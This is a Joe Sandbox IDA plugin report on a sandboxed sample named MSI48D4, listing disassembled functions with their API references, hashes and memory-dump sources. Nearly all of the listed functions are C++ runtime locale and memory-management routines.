Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: d03da9529a2f4415d6125f1951476947d5dc8fb9afc0bba033457a3630c7aab0
Instruction ID: 248e99e10f423b77c7f6c20f819411f41a6e343c8250a75ff8464c676e9bb2bb
Opcode Fuzzy Hash: d03da9529a2f4415d6125f1951476947d5dc8fb9afc0bba033457a3630c7aab0
Instruction Fuzzy Hash: 7001C0759002259FCB14EB64A8516FE77A1BF84710F25050AE4117B292CF749F80E791

Function 00C2E843 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2E84A
std::_Lockit::_Lockit.LIBCPMT ref: 00C2E854

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

collate.LIBCPMT ref: 00C2E88E
std::_Facet_Register.LIBCPMT ref: 00C2E8A5
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2E8C5

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: 2431f0eb16937f7b57bebbc4cc4a5c8d5b722cfaade1b74ca87d024a8abff327
Instruction ID: 42ae37b000d35a617fb5bdf7bbe17b9827d64d85b867120bba0329b155b0285a
Opcode Fuzzy Hash: 2431f0eb16937f7b57bebbc4cc4a5c8d5b722cfaade1b74ca87d024a8abff327
Instruction Fuzzy Hash: 4C01C075A002299FCB14EB68A8117AEB7A1AF84710F244509F4157B2D2CF709E44AB92

Function 00C229F6 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C229FD
std::_Lockit::_Lockit.LIBCPMT ref: 00C22A07

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

moneypunct.LIBCPMT ref: 00C22A41
std::_Facet_Register.LIBCPMT ref: 00C22A58
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22A78

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 9ed32d6eaa7e38c13bcad934763f6b82f3d75145d0fdfa8ec58a4df46fa98623
Instruction ID: c1bd0db9e09126c0080d62f82f8839458ca1edfc82addb935bcfdb0693c17440
Opcode Fuzzy Hash: 9ed32d6eaa7e38c13bcad934763f6b82f3d75145d0fdfa8ec58a4df46fa98623
Instruction Fuzzy Hash: 6B012275900225EFCB24EB60E8517BE77A1AF88320F250509F8116B692CF748E41EB91

Function 00C22961 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22968
std::_Lockit::_Lockit.LIBCPMT ref: 00C22972

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

moneypunct.LIBCPMT ref: 00C229AC
std::_Facet_Register.LIBCPMT ref: 00C229C3
std::_Lockit::~_Lockit.LIBCPMT ref: 00C229E3

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 2e67c2878c7e504a171592972a6fb761a37940eb1681c622dcc719835ffeac06
Instruction ID: 6201c1c4cb5d31845ff449e168581944864461704f182e894c970aaedac548e5
Opcode Fuzzy Hash: 2e67c2878c7e504a171592972a6fb761a37940eb1681c622dcc719835ffeac06
Instruction Fuzzy Hash: 3301D275A10125DFCB14FB64E812BAE7761AF84310F24050AF8116B292DF749E80AB91

Function 00C22A8B Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22A92
std::_Lockit::_Lockit.LIBCPMT ref: 00C22A9C

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

moneypunct.LIBCPMT ref: 00C22AD6
std::_Facet_Register.LIBCPMT ref: 00C22AED
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22B0D

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 8e1565981de5afe6cae613aee37be7ba78235feeb9b18c20328c128593ffc5e9
Instruction ID: c81039ca3e85461a7a9adafd09b85d6e1895d9ca3ddb490333afd27fc553769f
Opcode Fuzzy Hash: 8e1565981de5afe6cae613aee37be7ba78235feeb9b18c20328c128593ffc5e9
Instruction Fuzzy Hash: CD012675900224DFCB15EB64E8117AEB761BF84320F240409F41267282CF749F44EB91

Function 00C2EA97 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2EA9E
std::_Lockit::_Lockit.LIBCPMT ref: 00C2EAA8

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

moneypunct.LIBCPMT ref: 00C2EAE2
std::_Facet_Register.LIBCPMT ref: 00C2EAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2EB19

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 094f1f860107b4e8cfba2ba8396e2260a0d4aede39783b2d5ac8c3aec97e0f12
Instruction ID: 5c66f4c85777b3ee9142bb9e63140b27d1da60abaa27b3da4f27cb090d4499ab
Opcode Fuzzy Hash: 094f1f860107b4e8cfba2ba8396e2260a0d4aede39783b2d5ac8c3aec97e0f12
Instruction Fuzzy Hash: B401D275E00229DFCB24EBA4E8517AE7771BF84320F240509F4127B292DF709E41E791

Function 00C22B20 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22B27
std::_Lockit::_Lockit.LIBCPMT ref: 00C22B31

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

moneypunct.LIBCPMT ref: 00C22B6B
std::_Facet_Register.LIBCPMT ref: 00C22B82
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22BA2

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: c3678f8b847e13ba94461d5f99ebf2eeb14c223ffabbf9646ec7059904b026b2
Instruction ID: ccb3d049bf0e7a8d5e5d8a9416c7ffda1a0cb4e3343ea3429bfb1e51063b71c5
Opcode Fuzzy Hash: c3678f8b847e13ba94461d5f99ebf2eeb14c223ffabbf9646ec7059904b026b2
Instruction Fuzzy Hash: 7D01C075A00225EBCB14EBA4A855BAE7771AF84720F240509E4126B292DF749E44AB91

Function 00C2EB2C Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2EB33
std::_Lockit::_Lockit.LIBCPMT ref: 00C2EB3D

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

moneypunct.LIBCPMT ref: 00C2EB77
std::_Facet_Register.LIBCPMT ref: 00C2EB8E
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2EBAE

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 2ad7d923928b5014f501a62435013caf9b68a7d7b67f0139eb353b56b5467deb
Instruction ID: c90d73617fb8c8e4721c7a2f963444b06a003a7156ea111be84a2ec6928d058d
Opcode Fuzzy Hash: 2ad7d923928b5014f501a62435013caf9b68a7d7b67f0139eb353b56b5467deb
Instruction Fuzzy Hash: F001D275900229DFCB15EB60E8A1BAEB771BF84710F25050AF4127B3D2CF709E45AB91

Function 00C22D74 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22D7B
std::_Lockit::_Lockit.LIBCPMT ref: 00C22D85

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

numpunct.LIBCPMT ref: 00C22DBF
std::_Facet_Register.LIBCPMT ref: 00C22DD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22DF6

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID:
API String ID: 743221004-0
Opcode ID: 7698537dbca20012f90e0edb5aa7a8e0f7a9d5fd48c5ac955ee871c5061912b6
Instruction ID: 3238f9ea14bf631b7e4445ae6eb0cbd48729d7f69567d6fb3824ab0f9636eb92
Opcode Fuzzy Hash: 7698537dbca20012f90e0edb5aa7a8e0f7a9d5fd48c5ac955ee871c5061912b6
Instruction Fuzzy Hash: C801D275904265DFCB14EBA0E8117BEB7A1BF84310F250509F4117B292CF749F41EB91

Function 00C32C4E Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00C6DD3C,?,?,00C12427,00C6E638,00C56B40), ref: 00C32C58
LeaveCriticalSection.KERNEL32(00C6DD3C,?,?,00C12427,00C6E638,00C56B40), ref: 00C32C8B
RtlWakeAllConditionVariable.NTDLL ref: 00C32D02
SetEvent.KERNEL32(?,00C12427,00C6E638,00C56B40), ref: 00C32D0C
ResetEvent.KERNEL32(?,00C12427,00C6E638,00C56B40), ref: 00C32D18

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: 4ecfd15a957b1b7f390adb40f6e25f70055b1f5ed92343cf930a5a4198a13f2f
Instruction ID: 73e52d04ae0a5fcc4c499db9aa9691f65846595885e329d595a5075238653356
Opcode Fuzzy Hash: 4ecfd15a957b1b7f390adb40f6e25f70055b1f5ed92343cf930a5a4198a13f2f
Instruction Fuzzy Hash: FC016935A08660DFCB21AF19FC88BAD7BA5FF4A3427010469F90793330CBB01981CBA0

Function 00C1BB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000018,0EAD22C0,?,00000000), ref: 00C1BBA3
Concurrency::cancel_current_task.LIBCPMT ref: 00C1BD7F

Strings

false, xrefs: 00C1BC95
true, xrefs: 00C1BCAB

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: AllocConcurrency::cancel_current_taskLocal
String ID: false$true
API String ID: 3924972193-2658103896
Opcode ID: 27890b1e99991cd09e0a79b1855cead02e9a4b732e04bdfed0a4a629ea4baffc
Instruction ID: 8f2aee17756e89d924ff586d5b32a8268218faca451f28f9ae0aad419d5b3c33
Opcode Fuzzy Hash: 27890b1e99991cd09e0a79b1855cead02e9a4b732e04bdfed0a4a629ea4baffc
Instruction Fuzzy Hash: D061C1B1D00748DBDB10DFA4C841BDEBBF4FF15304F14826AE855AB281E774AA88DB91

Function 00C2D3CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2D3D2

Part of subcall function 00C2254E: __EH_prolog3.LIBCMT ref: 00C22555
Part of subcall function 00C2254E: std::_Lockit::_Lockit.LIBCPMT ref: 00C2255F
Part of subcall function 00C2254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00C225D0

_Find_elem.LIBCPMT ref: 00C2D46E

Strings

0123456789-, xrefs: 00C2D41E
%.0Lf, xrefs: 00C2D419

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: %.0Lf$0123456789-
API String ID: 2544715827-3094241602
Opcode ID: c930ea746391385e0091ef6eba1f2ce052270530e499d3280b397d79185bc9c5
Instruction ID: ab6275dd22b707f3cf833cb129dd70d8b9d5cd2b3c43fecdc49f6cddb1457166
Opcode Fuzzy Hash: c930ea746391385e0091ef6eba1f2ce052270530e499d3280b397d79185bc9c5
Instruction Fuzzy Hash: C5416E31910228DFCF15EFA4D880ADDBBB5FF18314F100169E811AB255DB30EA9ADBA1

Function 00C2D66F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C2D676

Part of subcall function 00C18610: std::_Lockit::_Lockit.LIBCPMT ref: 00C18657
Part of subcall function 00C18610: std::_Lockit::_Lockit.LIBCPMT ref: 00C18679
Part of subcall function 00C18610: std::_Lockit::~_Lockit.LIBCPMT ref: 00C186A1
Part of subcall function 00C18610: std::_Lockit::~_Lockit.LIBCPMT ref: 00C1880E

_Find_elem.LIBCPMT ref: 00C2D712

Strings

0123456789-, xrefs: 00C2D6BD
0123456789-, xrefs: 00C2D6C2

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 0123456789-$0123456789-
API String ID: 3042121994-2494171821
Opcode ID: 938cee661542185c59b496893ff1e771df9db7f1b4c9876752ac2d820183fdf9
Instruction ID: 5e90a329de5bab2ff27ac7b70f1a4ec0110c6e358a5a3f0cc8d43880313da9c9
Opcode Fuzzy Hash: 938cee661542185c59b496893ff1e771df9db7f1b4c9876752ac2d820183fdf9
Instruction Fuzzy Hash: 6C41B131910228DFCF11DFA4D880ADEBBB5FF19310F100169F912AB255DB34DA96EBA1

Function 00C3175A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C31761

Part of subcall function 00C19270: std::_Lockit::_Lockit.LIBCPMT ref: 00C192A0
Part of subcall function 00C19270: std::_Lockit::_Lockit.LIBCPMT ref: 00C192C2
Part of subcall function 00C19270: std::_Lockit::~_Lockit.LIBCPMT ref: 00C192EA
Part of subcall function 00C19270: std::_Lockit::~_Lockit.LIBCPMT ref: 00C19422

_Find_elem.LIBCPMT ref: 00C317FB

Strings

0123456789-, xrefs: 00C317AD
0123456789-, xrefs: 00C317A8

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
String ID: 0123456789-$0123456789-
API String ID: 3042121994-2494171821
Opcode ID: 7a5966959f2d0217bcbab42f7b756d9819086061daa20ff8e1486ee37aed1072
Instruction ID: 9a0680a853d3baabcb1de551a32887398d11e2fc0189c05f5ca3297e22b51675
Opcode Fuzzy Hash: 7a5966959f2d0217bcbab42f7b756d9819086061daa20ff8e1486ee37aed1072
Instruction Fuzzy Hash: 3F419E35910208EFCF05DFA4D881AEEBBB5FF05314F14005AF811AB252DB35DA56EB95

Function 00C28386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2838D

Part of subcall function 00C21C42: _Maklocstr.LIBCPMT ref: 00C21C62
Part of subcall function 00C21C42: _Maklocstr.LIBCPMT ref: 00C21C7F
Part of subcall function 00C21C42: _Maklocstr.LIBCPMT ref: 00C21C9C
Part of subcall function 00C21C42: _Maklocchr.LIBCPMT ref: 00C21CAE
Part of subcall function 00C21C42: _Maklocchr.LIBCPMT ref: 00C21CC1

_Mpunct.LIBCPMT ref: 00C2841A
_Mpunct.LIBCPMT ref: 00C28434

Strings

$+xv, xrefs: 00C2843F

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Maklocstr$MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2939335142-1686923651
Opcode ID: 84020ab6161a289080c0ff1925cdb55d307f67b438b3d2f3ea44a46be70f6188
Instruction ID: 9d18a255ec32187db6e24774aab16526721310675184916a5c3b5ef57993dbd8
Opcode Fuzzy Hash: 84020ab6161a289080c0ff1925cdb55d307f67b438b3d2f3ea44a46be70f6188
Instruction Fuzzy Hash: E621B2B1904AA26FD725EF75949077BBEF8BB08301F04055AE499C7E42D730E605DBA0

Function 00C2FFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2FFF1
_Mpunct.LIBCPMT ref: 00C3007E
_Mpunct.LIBCPMT ref: 00C30098

Strings

$+xv, xrefs: 00C300A3

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: daca8b85976c41ac7628a9a29d163e8d7fb8aebed097522021cad8bff6c22573
Instruction ID: 9b49dc06b7f1ff4683765052da5bce52f7c04a9b1d83bdcb5b61262ef83cae49
Opcode Fuzzy Hash: daca8b85976c41ac7628a9a29d163e8d7fb8aebed097522021cad8bff6c22573
Instruction Fuzzy Hash: D021A1B1904B926EDB25DF74849077BBEF8AB0C301F144A1AE4A9C7A42D734E641DBA0

Function 00C124C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00C11434,?,00000000), ref: 00C12569
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00C11434,?,00000000), ref: 00C12589
LocalFree.KERNEL32(?,00C11434,?,00000000), ref: 00C125DF
CloseHandle.KERNEL32(00000000,0EAD22C0,?,00000000,00C53C40,000000FF,00000008,?,?,?,?,00C11434,?,00000000), ref: 00C12633
LocalFree.KERNEL32(?,0EAD22C0,?,00000000,00C53C40,000000FF,00000008,?,?,?,?,00C11434), ref: 00C12647

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Local$AllocFree$CloseHandle
String ID:
API String ID: 1291444452-0
Opcode ID: e720e1acc21f66f313d33d9f40258515ca3eead094c262167a9ef3ca687777de
Instruction ID: 1145218a350cb5864537e127ec8741f4277590264093a1c28bcfdf6dd7d4fede
Opcode Fuzzy Hash: e720e1acc21f66f313d33d9f40258515ca3eead094c262167a9ef3ca687777de
Instruction Fuzzy Hash: 1941087A6003159BC7249F68D894BDEB7D9EB46361F10072AF526C72D0EB30E9D49790

Function 00C51D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(0EAD22C0,?,00000000,?), ref: 00C51DFE

Part of subcall function 00C4A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C46F5E,?,00000000,-00000008), ref: 00C4AA67

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C52059
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C520A1
GetLastError.KERNEL32 ref: 00C52144

